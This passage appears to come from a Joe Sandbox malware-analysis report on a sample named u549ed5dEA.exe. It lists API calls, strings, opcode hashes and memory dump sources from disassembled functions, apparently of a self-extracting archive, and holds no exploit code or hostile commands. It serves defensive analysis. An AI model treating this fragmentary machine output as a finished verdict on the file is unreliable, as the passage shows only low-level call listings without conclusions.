                                              • _free.LIBCMT ref: 00CC34D9
                                              • _free.LIBCMT ref: 00CC34EB
                                              • _free.LIBCMT ref: 00CC34FD
                                              • _free.LIBCMT ref: 00CC350F
                                              Similarity
                                              • API ID: _free$ErrorFreeHeapLast
                                              • String ID:
                                              APIs
                                              • _free.LIBCMT ref: 00CBF7DE
                                                • Part of subcall function 00CC03D4: RtlFreeHeap.NTDLL(00000000,00000000,?,00CC3546,?,00000000,?,00000000,?,00CC356D,?,00000007,?,?,00CC396A,?), ref: 00CC03EA
                                                • Part of subcall function 00CC03D4: GetLastError.KERNEL32(?,?,00CC3546,?,00000000,?,00000000,?,00CC356D,?,00000007,?,?,00CC396A,?,?), ref: 00CC03FC
                                              • _free.LIBCMT ref: 00CBF7F0
                                              • _free.LIBCMT ref: 00CBF803
                                              • _free.LIBCMT ref: 00CBF814
                                              • _free.LIBCMT ref: 00CBF825
                                              Similarity
                                              • API ID: _free$ErrorFreeHeapLast
                                              • String ID:
                                              APIs
                                              • _wcslen.LIBCMT ref: 00CB31A4
                                                • Part of subcall function 00C914A7: _wcslen.LIBCMT ref: 00C914B8
                                              Strings
                                              Similarity
                                              • API ID: _wcslen
                                              • String ID: .lnk$0$lnk
                                              APIs
                                              • GetTempPathW.KERNEL32(00000105,00000000,00000000,0000020A), ref: 00CB2B66
                                                • Part of subcall function 00C914A7: _wcslen.LIBCMT ref: 00C914B8
                                                • Part of subcall function 00CA0BF3: _wcslen.LIBCMT ref: 00CA0C03
                                              • EndDialog.USER32(?,00000001), ref: 00CB2EDA
                                              Strings
                                              Similarity
                                              • API ID: _wcslen$DialogPathTemp
                                              • String ID: $@set:user
                                              • API String ID: 2172748170-1503366402
                                              • Opcode ID: 0f936d668b8f0384d7abfe8d780e857614a6ec6099cca4e4df59741f8e3e8ae6
                                              • Instruction ID: 8cbdc7fedb523994b3bf80fc5982c27948c9fcad449c82281c8d0b7cb2bae8fe
                                              • Opcode Fuzzy Hash: 0f936d668b8f0384d7abfe8d780e857614a6ec6099cca4e4df59741f8e3e8ae6
                                              • Instruction Fuzzy Hash: 96C14C71C012999EDF20EBA4CC49BEDBBB4AF15304F54009AE849B7292DB705F89DF61
                                              APIs
                                                • Part of subcall function 00CA1309: __EH_prolog3.LIBCMT ref: 00CA1310
                                                • Part of subcall function 00CA1309: GetCurrentDirectoryW.KERNEL32(00000000,00000000,0000000C,00CA17FB,?,?,\\?\,9CAA5719,?,?,?,00000000,00CCA279,000000FF), ref: 00CA1319
                                                • Part of subcall function 00CA1AD1: __EH_prolog3_GS.LIBCMT ref: 00CA1AD8
                                                • Part of subcall function 00C9F763: __EH_prolog3_GS.LIBCMT ref: 00C9F76A
                                                • Part of subcall function 00C9F58B: __EH_prolog3_GS.LIBCMT ref: 00C9F592
                                                • Part of subcall function 00C9F58B: SetFileAttributesW.KERNELBASE(?,?,00000024,00C9A724,?,?,?,00000011,?,?,00000000,?,?,?,?,?), ref: 00C9F5A8
                                                • Part of subcall function 00C9F58B: SetFileAttributesW.KERNEL32(?,?,?,?,?,00C9D303,?,?,?,?,?,?,?,9CAA5719,00000049), ref: 00C9F5EB
                                              • SHFileOperationW.SHELL32(?,?,?,?,00000000), ref: 00CB2137
                                              • MoveFileW.KERNEL32(?,?), ref: 00CB22BE
                                              • MoveFileExW.KERNEL32(?,00000000,00000004), ref: 00CB22D8
                                                • Part of subcall function 00CA14CC: __EH_prolog3_GS.LIBCMT ref: 00CA14D3
                                              Similarity
                                              • API ID: File$H_prolog3_$AttributesMove$CurrentDirectoryH_prolog3Operation
                                              • String ID: .tmp
                                              • API String ID: 1688541384-2986845003
                                              • Opcode ID: d6083aefd8416623b78fdc08ee28c7e50f590a36b9f1686a73cd75b78e2ec987
                                              • Instruction ID: 60b8d21a6ee81fdd7d3e01e9a71a6d7a212131903224cc48df9ab418c26d5c4f
                                              • Opcode Fuzzy Hash: d6083aefd8416623b78fdc08ee28c7e50f590a36b9f1686a73cd75b78e2ec987
                                              • Instruction Fuzzy Hash: 1BC1D1718002699ADF25DFA4CC85BDDBBB8BF09304F5441EAE849A3251DB349B89DF21
                                              APIs
                                              • __EH_prolog3_GS.LIBCMT ref: 00C9A307
                                              • GetLastError.KERNEL32(00000054,?,?,?,?,?,00C9D303,?,?,?,?,?,?,?,9CAA5719,00000049), ref: 00C9A427
                                                • Part of subcall function 00C9AC11: GetCurrentProcess.KERNEL32(00000020,?), ref: 00C9AC2E
                                                • Part of subcall function 00C9AC11: GetLastError.KERNEL32 ref: 00C9AC72
                                                • Part of subcall function 00C9AC11: CloseHandle.KERNEL32(?), ref: 00C9AC81
                                              Similarity
                                              • API ID: ErrorLast$CloseCurrentH_prolog3_HandleProcess
                                              • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                              • API String ID: 2235100918-639343689
                                              • Opcode ID: 624603faa3cfb0c912e8f66c0cbfab1fd15fb095c859327aac3fa71ee53f8fa3
                                              • Instruction ID: 5b4d7de383ca763b5d1c9d8aa4c965538418407daf11d3a973b52edb02fe7cb7
                                              • Opcode Fuzzy Hash: 624603faa3cfb0c912e8f66c0cbfab1fd15fb095c859327aac3fa71ee53f8fa3
                                              • Instruction Fuzzy Hash: 2541A071E10208AFDF14EBA8E889BED77B4AF09314F04502EF501F7241DBB49A44DB62
                                              APIs
                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\u549ed5dEA.exe,00000104), ref: 00CBEE6A
                                              • _free.LIBCMT ref: 00CBEF35
                                              • _free.LIBCMT ref: 00CBEF3F
                                              Similarity
                                              • API ID: _free$FileModuleName
                                              • String ID: C:\Users\user\Desktop\u549ed5dEA.exe
                                              • API String ID: 2506810119-3887152593
                                              • Opcode ID: a621bddc54a0799008faf34263d7504f32c98323b66cd9124a146b906c4540e5
                                              • Instruction ID: 4ada34be98bda164df75f9f0d8e08de0f6b0f9bd299679ccdd212f715f011fa7
                                              • Opcode Fuzzy Hash: a621bddc54a0799008faf34263d7504f32c98323b66cd9124a146b906c4540e5
                                              • Instruction Fuzzy Hash: E9316D71A04298AFDB21DB99DC81EEEBBFCEB95B10F1440AAF4049B211D7709E40DB91
                                              APIs
                                              • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00CB9E7B
                                              • _abort.LIBCMT ref: 00CB9F86
                                              Similarity
                                              • API ID: EncodePointer_abort
                                              • String ID: MOC$RCC
                                              • API String ID: 948111806-2084237596
                                              • Opcode ID: dab3aee01029135c38f3e43407f77890b0c5a76143c46eca86b7fc62a16abb1f
                                              • Instruction ID: db258a1297ce42ae7c92e79debb62533d3eacf5d5558b9774f58267b78be67c9
                                              • Opcode Fuzzy Hash: dab3aee01029135c38f3e43407f77890b0c5a76143c46eca86b7fc62a16abb1f
                                              • Instruction Fuzzy Hash: D2416971900209EFCF15DF98CD81AEEBBB5FF48314F188199FA14A7261D335AA51DB50
                                              APIs
                                              • __fprintf_l.LIBCMT ref: 00CA340E
                                              • _strncpy.LIBCMT ref: 00CA3459
                                                • Part of subcall function 00CA89ED: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000050,?,00000000,00000000,00CDE088,?,00000007,00CA33E2,?,?,00000050,9CAA5719), ref: 00CA8A0A
                                              Similarity
                                              • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                              • String ID: $%s$@%s
                                              • API String ID: 562999700-834177443
                                              • Opcode ID: 12c70323da07b55ca902f329593029418f15f4fadb104cc995b1b3e14e97d6bd
                                              • Instruction ID: 2d519e38db16c9b0983428206db256309947551aea164ea243318396214c4896
                                              • Opcode Fuzzy Hash: 12c70323da07b55ca902f329593029418f15f4fadb104cc995b1b3e14e97d6bd
                                              • Instruction Fuzzy Hash: 0721917260074EABDB10DEA8CC85FEE7BA8FB0A304F040526FA15D7191D734EA15CB60
                                              APIs
                                              • __EH_prolog3_GS.LIBCMT ref: 00CAF8F7
                                                • Part of subcall function 00C91E44: GetDlgItem.USER32(00000000,00003021), ref: 00C91E88
                                                • Part of subcall function 00C91E44: SetWindowTextW.USER32(00000000,00CCC6C8), ref: 00C91E9E
                                              • EndDialog.USER32(?,00000001), ref: 00CAF99F
                                              • SetDlgItemTextW.USER32(?,00000066,00000000), ref: 00CAF9E1
                                              Similarity
                                              • API ID: ItemText$DialogH_prolog3_Window
                                              • String ID: ASKNEXTVOL
                                              • API String ID: 2321058237-3402441367
                                              • Opcode ID: b598fd1d30c091baba56f502676292d347da7a981f1ea9b88e044c6688a24333
                                              • Instruction ID: 0f5770ee6f054dba147be40732e846ae263e4ff8d5672b27f5b07fd3e85f84a5
                                              • Opcode Fuzzy Hash: b598fd1d30c091baba56f502676292d347da7a981f1ea9b88e044c6688a24333
                                              • Instruction Fuzzy Hash: C7215E31640246BFDB14EFB4CC8AFAE37A8AB07349F140028F9519B1E5C7719A06DB25
                                              APIs
                                              • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00C9FEBD,00000008,00000004,00CA2D42,?,?,?,?,00000000,00CAABB6,?), ref: 00CA7484
                                              • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00C9FEBD,00000008,00000004,00CA2D42,?,?,?,?,00000000), ref: 00CA748E
                                              • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00C9FEBD,00000008,00000004,00CA2D42,?,?,?,?,00000000), ref: 00CA749E
                                              Strings
                                              • Thread pool initialization failed., xrefs: 00CA74B6
                                              Similarity
                                              • API ID: Create$CriticalEventInitializeSectionSemaphore
                                              • String ID: Thread pool initialization failed.
                                              • API String ID: 3340455307-2182114853
                                              • Opcode ID: b7290801547145c7da1d51669f4fdef7d075eae5d9687fe30855efbc5027a949
                                              • Instruction ID: b05fa7ddacee422476985ead61ad1e857d06e25770f1223d8bc268f11b3de432
                                              • Opcode Fuzzy Hash: b7290801547145c7da1d51669f4fdef7d075eae5d9687fe30855efbc5027a949
                                              • Instruction Fuzzy Hash: 3C1173B1644709AFD3215F6ADCC4AA7FFDCFB59758F10492EF1DAC2200D6B169808B64
                                              Similarity
                                              • API ID:
                                              • String ID: RENAMEDLG$REPLACEFILEDLG
                                              • API String ID: 0-56093855
                                              • Opcode ID: cb628a074b420350cbfdba24e45c7a3a792df8fe03aa5b643f63cc0f35695ddc
                                              • Instruction ID: d47b72689eb0a2765fd4cce872359334fbb510f3b313ef096d8aa5cc915dd8fa
                                              • Opcode Fuzzy Hash: cb628a074b420350cbfdba24e45c7a3a792df8fe03aa5b643f63cc0f35695ddc
                                              • Instruction Fuzzy Hash: 78118270748384AFD724AF19ED84B5A7BE8E749395F04442AFA41CB361C2719844EF61
                                              APIs
                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00CBA843,00000000,?,00CE6150,?,?,?,00CBA9E6,00000004,InitializeCriticalSectionEx,00CCF7F4,InitializeCriticalSectionEx), ref: 00CBA89F
                                              • GetLastError.KERNEL32(?,00CBA843,00000000,?,00CE6150,?,?,?,00CBA9E6,00000004,InitializeCriticalSectionEx,00CCF7F4,InitializeCriticalSectionEx,00000000,?,00CBA79D), ref: 00CBA8A9
                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00CBA8D1
                                              Similarity
                                              • API ID: LibraryLoad$ErrorLast
                                              • String ID: api-ms-
                                              • API String ID: 3177248105-2084034818
                                              • Opcode ID: 0da01f723e47f817cfd9ad1369f939af1f35ccc14e8082344a11fc03482d84c5
                                              • Instruction ID: 3aabf386fea2ee2d66d832645e63106f55673fffd557f81f7de03faa5b1423db
                                              • Opcode Fuzzy Hash: 0da01f723e47f817cfd9ad1369f939af1f35ccc14e8082344a11fc03482d84c5
                                              • Instruction Fuzzy Hash: 25E04830280205B7DF101FA0EC46F5C3A599B10B51F100034F94EE4CE0D762991296D5
                                              Similarity
                                              • API ID: __alldvrm$_strrchr
                                              • String ID:
                                              • API String ID: 1036877536-0
                                              • Opcode ID: 1ec6666d94b4212580304211626675eb5ed9854efa503107affec4ce99a0ac8c
                                              • Instruction ID: 4374aa5929288da64056ec19828d27f0c36fa319c81cc88f1cffa51097f3e4af
                                              • Opcode Fuzzy Hash: 1ec6666d94b4212580304211626675eb5ed9854efa503107affec4ce99a0ac8c
                                              • Instruction Fuzzy Hash: 75A13872A04786DFEB11CF28C891FAEBBE5EF55310F3841ADE5A59B282C6348E41D750
                                              APIs
                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00CC0481,?,00000000,?,00000001,?,?,00000001,00CC0481,?), ref: 00CC3685
                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00CC370E
                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00CBDBD1,?), ref: 00CC3720
                                              • __freea.LIBCMT ref: 00CC3729
                                                • Part of subcall function 00CC040E: RtlAllocateHeap.NTDLL(00000000,00CB535E,?,?,00CB6C16,?,?,?,?,?,00CB5269,00CB535E,?,?,?,?), ref: 00CC0440
                                              Similarity
                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                              • String ID:
                                              • API String ID: 2652629310-0
                                              • Opcode ID: aff0ca029ec4f4c4b777a2f8c01af4535353a77c985552dc24a273e7e5b79328
                                              • Instruction ID: 7f586ec45316faf9280b214ec375d185458aad83abe93f6c10b5f4f7d2fa1454
                                              • Opcode Fuzzy Hash: aff0ca029ec4f4c4b777a2f8c01af4535353a77c985552dc24a273e7e5b79328
                                              • Instruction Fuzzy Hash: 5C31C0B1A0024AABDF259F65EC81FEE7BA5EB40350F14412CFC14D6250EB36CE51CB90
                                              APIs
                                              • __EH_prolog3.LIBCMT ref: 00CA62D4
                                              • ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,?,?,?,?,?,00000010), ref: 00CA62EB
                                              • ExpandEnvironmentStringsW.KERNEL32(?,?,?,00000000,?,?,?,?,?,00000010), ref: 00CA6328
                                              • _wcslen.LIBCMT ref: 00CA6338
                                              Similarity
                                              • API ID: EnvironmentExpandStrings$H_prolog3_wcslen
                                              • String ID:
                                              • API String ID: 3741103063-0
                                              • Opcode ID: c4e95b3bd55009b67dcdb592e5be290fe26d5d28d8a1a17d2ce6fd45152b3d86
                                              • Instruction ID: 658c0687103d92498d5a0c47573962fd03dd5498186d107085d984c833fbcdd7
                                              • Opcode Fuzzy Hash: c4e95b3bd55009b67dcdb592e5be290fe26d5d28d8a1a17d2ce6fd45152b3d86
                                              • Instruction Fuzzy Hash: 6D117370A1120BAF9F049F64C989ABFBB79BF45318B18411DE411E7250DB349E52DBA4
                                              APIs
                                              • __EH_prolog3.LIBCMT ref: 00CA1273
                                                • Part of subcall function 00CA067E: GetVersionExW.KERNEL32(?), ref: 00CA06AF
                                              • FoldStringW.KERNEL32(00000020,?,000000FF,00000000,00000000,0000000C,00C9350C,9CAA5741,00000000,?,?,00C943F5,?,?,?,00000000), ref: 00CA129A
                                              • FoldStringW.KERNEL32(00000020,?,000000FF,?,?,00000000), ref: 00CA12D4
                                              • _wcslen.LIBCMT ref: 00CA12DF
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                               • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: FoldString$H_prolog3Version_wcslen
                                              • String ID:
                                              • API String ID: 535866816-0
                                              • Opcode ID: 06babd54996746b6e319dbb70dc5285595a17d90cf49b5adeae3c68774544298
                                              • Instruction ID: f7fde000bb135db2f91f139059ffc8daec6d6e3e729925c160401a0216489bb9
                                              • Opcode Fuzzy Hash: 06babd54996746b6e319dbb70dc5285595a17d90cf49b5adeae3c68774544298
                                              • Instruction Fuzzy Hash: 9E115471A11526ABDB009FA9CD4AAAF7B79AF45724F140309FD20E72D1CF60995086F1
                                              APIs
                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,00CC198B,00000000,00000000,00000000,00000000,?,00CC1B88,00000006,FlsSetValue), ref: 00CC1A16
                                              • GetLastError.KERNEL32(?,00CC198B,00000000,00000000,00000000,00000000,?,00CC1B88,00000006,FlsSetValue,00CD0DD0,FlsSetValue,00000000,00000364,?,00CC00D7), ref: 00CC1A22
                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00CC198B,00000000,00000000,00000000,00000000,?,00CC1B88,00000006,FlsSetValue,00CD0DD0,FlsSetValue,00000000), ref: 00CC1A30
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                               • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: LibraryLoad$ErrorLast
                                              • String ID:
                                              • API String ID: 3177248105-0
                                              • Opcode ID: ddba07480d5e87f6be1e7fa16df73e164b55781adcceeb5a9ee5bdb2208b51e6
                                              • Instruction ID: 5e34528e39472d211c31ad0cb04e943f856c9089637851aa19ec3deae1c0888f
                                              • Opcode Fuzzy Hash: ddba07480d5e87f6be1e7fa16df73e164b55781adcceeb5a9ee5bdb2208b51e6
                                              • Instruction Fuzzy Hash: 8601F732657222ABC7218AABDC84F5A779CEF067A1B290628FD1AD7241C720DD01D6E4
                                              APIs
                                              • __EH_prolog3.LIBCMT ref: 00CA1310
                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000,0000000C,00CA17FB,?,?,\\?\,9CAA5719,?,?,?,00000000,00CCA279,000000FF), ref: 00CA1319
                                              • GetCurrentDirectoryW.KERNEL32(?,?,00000000,?,?,?,00000000,00CCA279,000000FF), ref: 00CA1348
                                              • _wcslen.LIBCMT ref: 00CA1351
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                               • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: CurrentDirectory$H_prolog3_wcslen
                                              • String ID:
                                              • API String ID: 19219720-0
                                              • Opcode ID: 4d207f1f3d8af1e5f8aa1a12b2e2ba824adddb07f491d87dadc47b27cea83523
                                              • Instruction ID: 31595708d1a20dcd9763459c4358c96864442fa3b9596adf8b8f5d1e684d97f8
                                              • Opcode Fuzzy Hash: 4d207f1f3d8af1e5f8aa1a12b2e2ba824adddb07f491d87dadc47b27cea83523
                                              • Instruction Fuzzy Hash: 2B01A27190051AAB8F00AFB9894AEFFBB79AF82720F190209F911E7251CF345900A6E0
                                              APIs
                                              • SleepConditionVariableCS.KERNELBASE(?,00CB62BB,00000064), ref: 00CB6341
                                              • LeaveCriticalSection.KERNEL32(00CE60E0,?,?,00CB62BB,00000064,?,?,?,?,00000000,00CCA75D,000000FF), ref: 00CB634B
                                              • WaitForSingleObjectEx.KERNEL32(00000064,00000000,?,00CB62BB,00000064,?,?,?,?,00000000,00CCA75D,000000FF), ref: 00CB635C
                                              • EnterCriticalSection.KERNEL32(00CE60E0,?,00CB62BB,00000064,?,?,?,?,00000000,00CCA75D,000000FF), ref: 00CB6363
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                               • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                              • String ID:
                                              • API String ID: 3269011525-0
                                              • Opcode ID: a45fb72cac684889568e2634c61c030ba96eb33d552e99b948fe6ec377353d45
                                              • Instruction ID: 0eebcdd6cc18f0571975ac3c01382e68aaae7356895d2079d378a5e3513f7a0d
                                              • Opcode Fuzzy Hash: a45fb72cac684889568e2634c61c030ba96eb33d552e99b948fe6ec377353d45
                                              • Instruction Fuzzy Hash: E7E01A32A51274EBCB111B92EC89F9D7F68AB14BE1F044065F90AA6170C6615A119BD8
                                              APIs
                                              • GetDC.USER32(00000000), ref: 00CAEB77
                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 00CAEB86
                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00CAEB94
                                              • ReleaseDC.USER32(00000000,00000000), ref: 00CAEBA2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                               • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: CapsDevice$Release
                                              • String ID:
                                              • API String ID: 1035833867-0
                                              • Opcode ID: f36022f87c2dc96086183e224d29b2cea13b70ee6c2f8fc854ab25b8669fd256
                                              • Instruction ID: 64a9b16f1b7963ffb2155d5fcd62d2855c07114b78d5d345bbdd26fcb00d270a
                                              • Opcode Fuzzy Hash: f36022f87c2dc96086183e224d29b2cea13b70ee6c2f8fc854ab25b8669fd256
                                              • Instruction Fuzzy Hash: EAE0123594AFA0ABD7212B70BD8DB8F3E54AF1AB63F000241F705AE1E0C6B444018BD4
                                              APIs
                                              • __Init_thread_footer.LIBCMT ref: 00CA8294
                                                • Part of subcall function 00C914A7: _wcslen.LIBCMT ref: 00C914B8
                                                • Part of subcall function 00CB087E: __EH_prolog3_GS.LIBCMT ref: 00CB0885
                                                • Part of subcall function 00CB087E: GetLastError.KERNEL32(0000001C,00CA8244,?,00000000,00000086,?,9CAA5719,?,?,?,?,?,00000000,00CCA75D,000000FF), ref: 00CB089D
                                                • Part of subcall function 00CB087E: SetLastError.KERNEL32(00000000,?,?,?,?,?,?,?,00000000,00CCA75D,000000FF), ref: 00CB08D6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                               • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: ErrorLast$H_prolog3_Init_thread_footer_wcslen
                                              • String ID: %ls
                                              • API String ID: 1279724102-3246610740
                                              • Opcode ID: 06b21c9f1b6f08538462ca1c86364bc2f819ec9b2bbfcd2fc3353cf87640264d
                                              • Instruction ID: bd92073932c531251bce17e619733a1b0b814b0df7b32c39d0206e693136bd37
                                              • Opcode Fuzzy Hash: 06b21c9f1b6f08538462ca1c86364bc2f819ec9b2bbfcd2fc3353cf87640264d
                                              • Instruction Fuzzy Hash: 54B19F7080420AEBDF24EF50CD4AFAE7BB1BF16318F104519F952661E1DBB15A28EB80
                                              APIs
                                                • Part of subcall function 00CAEBAA: GetDC.USER32(00000000), ref: 00CAEBAE
                                                • Part of subcall function 00CAEBAA: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00CAEBB9
                                                • Part of subcall function 00CAEBAA: ReleaseDC.USER32(00000000,00000000), ref: 00CAEBC4
                                              • GetObjectW.GDI32(?,00000018,?), ref: 00CAEF65
                                                • Part of subcall function 00CAF1EC: GetDC.USER32(00000000), ref: 00CAF1F5
                                                • Part of subcall function 00CAF1EC: GetObjectW.GDI32(?,00000018,?), ref: 00CAF224
                                                • Part of subcall function 00CAF1EC: ReleaseDC.USER32(00000000,?), ref: 00CAF2BC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                               • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: ObjectRelease$CapsDevice
                                              • String ID: (
                                              • API String ID: 1061551593-3887548279
                                              • Opcode ID: d0e90225c10e46f739132958e03ea8aa5f1b6b77334a63c333e903a6d4b4743d
                                              • Instruction ID: 0a6241315a92fed324f55782653f6469bce18425a51bf62e9258a3b2ee9a47d9
                                              • Opcode Fuzzy Hash: d0e90225c10e46f739132958e03ea8aa5f1b6b77334a63c333e903a6d4b4743d
                                              • Instruction Fuzzy Hash: EB91F2716083559FC650DF65C888E2FBBE9FF89B14F00491EF58AD7260DB70A906CB62
                                              APIs
                                              • _free.LIBCMT ref: 00CC1FD4
                                                • Part of subcall function 00CBACBB: IsProcessorFeaturePresent.KERNEL32(00000017,00CBAC8D,00CB535E,?,?,00000000,00CB535E,00000016,?,?,00CBAC9A,00000000,00000000,00000000,00000000,00000000), ref: 00CBACBD
                                                • Part of subcall function 00CBACBB: GetCurrentProcess.KERNEL32(C0000417,?,00CB535E), ref: 00CBACDF
                                                • Part of subcall function 00CBACBB: TerminateProcess.KERNEL32(00000000,?,00CB535E), ref: 00CBACE6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                               • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                              • String ID: *?$.
                                              • API String ID: 2667617558-3972193922
                                              • Opcode ID: ddd9ab5e61b6f17a30a233bd59a6b62b4ed979bfdbd97246aefffea125efcfc1
                                              • Instruction ID: 3c244c67cb1366eef82d7246a6c20be0e3b6071f6ff306c18b4a5a419d9bf2cd
